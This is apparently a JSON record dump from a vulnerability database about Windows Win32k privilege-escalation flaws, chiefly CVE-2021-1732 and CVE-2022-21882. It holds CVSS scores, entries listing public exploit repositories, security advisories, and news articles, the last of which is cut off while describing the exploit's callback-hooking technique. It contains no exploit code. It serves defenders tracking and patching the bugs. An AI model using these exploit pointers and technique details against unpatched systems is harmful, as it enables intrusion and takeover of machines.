"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-12-18T11:55:36", "id": "1D0AAF42-5E68-5985-A800-90937D55628D", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-04T11:09:02", "description": "<h1 style=\"font-size:10vw\" align=\"center\">Windows Privilege Esca...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-25T12:55:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-04-04T09:12:40", "id": "5E516DC2-BF71-57D0-9A87-3874146D0F83", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-15T04:36:04", "description": "# CVE-2021-1732\nCVE-\u00ad2021\u00ad-1732 Microsoft Windows 10 \u672c\u5730\u63d0\u6743\u6f0f \u7814\u7a76\u53caPo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T05:07:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-05-15T01:30:24", "id": "91A5BC48-2410-555B-B7FB-8138577D6B78", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-05T03:15:52", "description": "# CVE-2021-1732-Exploit\nCVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-05T02:11:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-05-05T02:28:30", "id": "02C6FE13-5036-5BE5-8AC8-278A918BA581", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:02:35", "description": "# CVE-2020-1054\nCVE-2020-1054 Learning\n\n\nScreenshot\n------------...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-19T08:20:57", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1054", "CVE-2016-7255", "CVE-2019-0808"], "modified": "2021-12-15T14:39:51", "id": "8DEC0717-2A5D-57F3-BBC7-7F0A9C394CC0", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-15T20:28:07", "description": "# CVE-2021-1732\n\nWin32k Elevation Of Privileges\n\nTechni...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-15T16:55:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-15T17:00:00", "id": "25DCDCD3-A32C-5B44-B706-FFF9535ECFC2", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T00:00:34", "description": "# CVE-2022-21882\n\nWin32k Elevation Of Privileges\n\nTechn...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-14T21:28:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882", "CVE-2021-1732"], "modified": "2022-03-15T22:03:21", "id": "FBC7C8E7-D9E9-50AF-A463-1504B4FC5BE9", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T07:51:24", "description": "# CVE-2022-21882\nwin32k LPE bypass CVE-2021-17...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-27T03:44:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-04-04T04:45:33", "id": "1C45657B-E388-5668-9093-F3934858B728", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T13:00:38", "description": "# CVE-2022-21882\nwin32k LPE bypass CVE-2021-1732\n\n## Test\n- only...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-01T17:58:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-04-04T09:10:13", "id": "453B4EEE-340B-58DA-84D9-277C9D4EFC12", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-02T05:37:11", "description": "# TOP\nTOP All bugbounty pentesting CVE-2022- POC Exp Things\n## ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-19T01:54:15", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Fusion Middleware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4210", "CVE-2016-0638", "CVE-2016-3510", "CVE-2016-5195", "CVE-2017-10271", "CVE-2017-11882", "CVE-2017-3248", "CVE-2017-3506", "CVE-2018-0296", "CVE-2018-0802", "CVE-2018-0886", "CVE-2018-1002105", "CVE-2018-10933", "CVE-2018-11776", "CVE-2018-13379", "CVE-2018-13382", "CVE-2018-14847", "CVE-2018-15473", "CVE-2018-15982", "CVE-2018-20250", "CVE-2018-2628", "CVE-2018-2893", "CVE-2018-2894", "CVE-2018-3191", "CVE-2018-3245", "CVE-2018-3252", "CVE-2018-7600", "CVE-2018-8120", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8581", "CVE-2018-8897", "CVE-2018-9995", "CVE-2019-0192", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0841", "CVE-2019-1003000", "CVE-2019-1003001", "CVE-2019-1003002", "CVE-2019-1040", "CVE-2019-11043", "CVE-2019-11510", "CVE-2019-11708", "CVE-2019-11932", "CVE-2019-12586", "CVE-2019-12587", "CVE-2019-12588", "CVE-2019-1322", "CVE-2019-13272", "CVE-2019-1405", "CVE-2019-17558", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-2107", "CVE-2019-2618", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-2890", "CVE-2019-3396", "CVE-2019-5736", "CVE-2019-5786", "CVE-2019-6340", "CVE-2019-9810", "CVE-2020-0601", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0674", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-10199", "CVE-2020-10204", "CVE-2020-11444", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-1362", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-1938", "CVE-2020-2546", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-25684", "CVE-2020-25685", "CVE-2020-25686", "CVE-2020-2798", "CVE-2020-2801", "CVE-2020-2883", "CVE-2020-2884", "CVE-2020-2915", "CVE-2020-2950", "CVE-2020-5902", "CVE-2020-6286", "CVE-2020-6287", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31166", "CVE-2021-31195", "CVE-2021-31196", "CVE-2021-31207", "CVE-2021-3129", "CVE-2021-3156", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-3493", "CVE-2021-4034", "CVE-2021-40444", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42278", "CVE-2021-42287", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105", "CVE-2022-0185", "CVE-2022-0337", "CVE-2022-0778", "CVE-2022-0824", "CVE-2022-0847", "CVE-2022-20699", "CVE-2022-21882", "CVE-2022-21907", "CVE-2022-21971", "CVE-2022-21974", "CVE-2022-21999", "CVE-2022-22536", "CVE-2022-22947", "CVE-2022-23131", "CVE-2022-23808", "CVE-2022-24086", "CVE-2022-24112", "CVE-2022-25636", "CVE-2022-25943"], "modified": "2022-04-02T05:13:27", "id": "2C119FFA-ECE0-5E14-A4A4-354A2C38071A", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "trendmicroblog": [{"lastseen": "2021-10-19T14:36:36", "description": "In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-19T00:00:00", "type": "trendmicroblog", "title": "PurpleFox Adds New Backdoor That Uses WebSockets", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-10-19T00:00:00", "id": "TRENDMICROBLOG:C9F6DD38959C2193331C83CA846C0A71", "href": "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T18:37:14", "description": "In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-19T00:00:00", "type": "trendmicroblog", "title": "PurpleFox Adds New Backdoor That Uses WebSockets", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-10-19T00:00:00", "id": "TRENDMICROBLOG:B5EA1F5E613C3A15D832147CF064EC78", "href": "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-03-08T18:38:38", "description": "Microsoft has released a security advisory to address an escalation of privileges vulnerability, [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>), in Microsoft Win32k. A local attacker can exploit this vulnerability to take control of an affected system. This vulnerability was detected in exploits in the wild.\n\nCISA encourages users and administrators to review Microsoft Advisory for CVE-2021-1732 and apply the necessary patch to Windows 10 and Windows 2019 servers.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/02/09/microsoft-warns-windows-win32k-privilege-escalation>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "cisa", "title": "Microsoft Warns of Windows Win32k Privilege Escalation", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-02-09T00:00:00", "id": "CISA:911DE59572B6EF78B42DD868D622F637", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/02/09/microsoft-warns-windows-win32k-privilege-escalation", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-02-16T18:53:24", "description": "Microsoft has removed a faulty servicing stack update, which was causing issues for Windows users when they tried to install last week\u2019s [Patch Tuesday security updates](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>).\n\nMicrosoft\u2019s [servicing stack update](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) provides fixes for the component that installs Windows updates. This particular defective update ([KB4601392](<https://support.microsoft.com/en-us/topic/kb5001078-servicing-stack-update-for-windows-10-version-1607-february-12-2021-3e19bfd1-7711-48a8-978b-ce3620ec6362>)) applied to Windows 10 users (version 1607 for 32-bit and x64-based systems) and Windows Server 2016 users.\n\nTo address this issue, Microsoft has removed the faulty update and released a new one ([KB5001078](<https://support.microsoft.com/en-us/topic/kb5001078-servicing-stack-update-for-windows-10-version-1607-february-12-2021-3e19bfd1-7711-48a8-978b-ce3620ec6362>)).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThere is a known issue that halts the installation progress of the February 9, 2021 security update,\u201d said Microsoft on Friday.\n\n## **Microsoft Faulty Update: A Windows Security Issue **\n\nMicrosoft said that the erroneous servicing-stack update (KB4601392) froze installations for the \u201cCumulative Update\u201d from the recent Windows Update. This resulted in the installation for the update halting at 24 percent.\n\nWindows users \u2013 who [reported issues](<https://www.askwoody.com/tag/kb5001078/>) \u2013 must install this new servicing stack update before installing the its recent February Patch Tuesday security update from last week.\n\n\u201cYou must install the new servicing-stack update (SSU) [KB5001078 ](<https://support.microsoft.com/en-us/topic/kb5001078-servicing-stack-update-for-windows-10-version-1607-february-12-2021-3e19bfd1-7711-48a8-978b-ce3620ec6362>)before installing this cumulative update (LCU),\u201d according to Microsoft. \u201cSSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes.\u201d\n\n## **How Windows Users Can Mitigate if They Already Installed KB4601392**\n\nMicrosoft gave the follow mitigation advice for devices that have already installed KB4601392:\n\n * Users should restart their devices and then follow only steps 1, 2 and 4a from [Reset Windows Update components manually.](<https://docs.microsoft.com/en-us/windows/deployment/update/windows-update-resources#reset-windows-update-components-manually>)\n * They should then restart their devices again.\n * [KB5001078](<https://support.microsoft.com/help/5001078>) should now install from Windows Update when users select \u201ccheck for updates\u201d \u2013 or they can wait for it to install automatically.\n * Users should then be able to install the latest Cumulative Update from Windows Update.\n\nFor Windows users who haven\u2019t applied the previous update, the new update \u201cis available through Windows Update,\u201d said Microsoft. \u201cIt will be downloaded and installed automatically.\u201d\n\nTo get the stand-alone package for the update, users can also go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5001078>) website said Microsoft.\n\n## **Patch Tuesday Security Updates: Apply Now **\n\nMicrosoft\u2019s February Patch Tuesday from last week addressed nine critical-severity cybersecurity bugs, plus an important-rated vulnerability that is being actively exploited in the wild.\n\nThe bug tracked as [CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>),** **is being actively exploited, according to Microsoft\u2019s advisory. This underscores the need for sysadmins to quickly apply the update. This is why the faulty servicing-stack update creating an obstacle for deploying Patch Tuesday updates is an issue for companies.\n\n\u201cThe exploitation of this vulnerability would allow an attacker to execute code in the context of the kernel and gain SYSTEM privileges, essentially giving the attacker free rein to do whatever they wanted with the compromised machine,\u201d said Chris Hass, director of Information Security and Research at Automox, in an email.\n\n\u201cBecause this vulnerability is already being used by attackers, patching this vulnerability is as soon as possible is absolutely crucial,\u201d said Hass.\n\n### _Is your small- to medium-sized business an easy mark for attackers?_\n\n**Threatpost WEBINAR:** _ Save your spot for __\u201c_**15 Cybersecurity Gaffes SMBs Make**_,\u201d a _[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)** _on Feb. 24 at 2 p.m. ET._**_ Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. _[_Register NOW_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)_ for this _**_LIVE_****_ _**_webinar on Wed., Feb. 24._\n", "cvss3": {}, "published": "2021-02-16T16:47:36", "type": "threatpost", "title": "Microsoft Pulls Bad Windows Update After Patch Issue", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1732"], "modified": "2021-02-16T16:47:36", "id": "THREATPOST:FFC3DB875D4337781CF78C0D4B39F0E0", "href": "https://threatpost.com/microsoft-windows-update-patch-tuesday/163981/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Security teams might have skipped January\u2019s Patch Tuesday after reports of it breaking servers, but it also included a patch for a privilege-escalation bug in Windows 10 that leaves unpatched systems open to malicious actors looking for administrative access. It\u2019s a bug that now has a proof-of-concept exploit [available in the wild](<https://github.com/gdabah/win32k-bugs/blob/master/console.cpp>).\n\nThe exploit was released by Gil Dabah, founder and CEO of Privacy Piiano, who tweeted that he decided not to report the bug two years ago after finding it difficult to get paid on other bug bounties through the Microsoft program.\n\n> Found it two years ago. Not recently. That\u2019s the point. <https://t.co/PtRuNDAEYQ>\n> \n> \u2014 Gil Dabah (@_arkon) [January 26, 2022](<https://twitter.com/_arkon/status/1486449470741135362?ref_src=twsrc%5Etfw>)\n\n## **The LPE Bug **\n\n\u201cA local, authenticated attacker could gain elevated local system or [administrator privileges](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) through a vulnerability in the Win32k.sys driver,\u201d Microsoft explained in it\u2019s advisory, part of [January\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/>).\n\nThe [disclosure for CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-21882.html>) from RyeLv, who is attributed with the find, was published on Jan. 13 and described the [win32k object type confusion](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) vulnerability.\n\n\u201cThe attacker can call the relevant GUI API at the user_mode to make the kernel call like xxxMenuWindowProc, xxxSBWndProc, xxxSwitchWndProc, xxxTooltipWndProc, etc.,\u201d the disclosure by RyeLV said.\n\n\u201cThese kernel functions will trigger a callback xxxClientAllocWindowClassExtraBytes. Attacker can intercept this callback through hook xxxClientAllocWindowClassExtraBytes in 